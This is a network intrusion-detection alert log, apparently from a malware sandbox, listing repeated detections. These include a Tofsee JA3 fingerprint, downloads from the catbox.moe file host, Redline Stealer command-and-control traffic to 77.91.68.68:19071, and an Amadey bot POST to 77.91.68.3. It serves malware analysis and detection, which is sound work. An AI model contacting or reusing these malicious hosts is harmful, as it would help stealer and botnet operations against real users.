TCP 192.168.56.101:49433 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49396 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49433 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49341 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49443 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49443 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49401 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49451 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49443 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49454 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49444 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49444 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49405 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49427 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49427 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49444 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49367 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49367 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49427 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49367 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49445 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49415 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49431 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49431 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49196 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49369 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49431 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49447 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49447 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49421 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49447 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49463 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49379 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49379 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49432 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49379 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49465 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49423 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49438 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49384 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49438 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49470 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49470 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49425 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49470 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49387 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49466 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49466 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49387 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49478 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49466 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49394 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49467 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49467 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49479 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49394 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49479 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49467 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49479 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49456 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49395 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49468 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49468 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49495 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49495 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49468 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49495 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49475 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49475 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49233 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49233 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49475 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49397 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49497 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49459 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49500 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49398 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49461 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49461 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49240 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49481 -> 77.91.68.3:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.101:49461 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49508 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49241 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49462 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49509 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49509 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49249 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
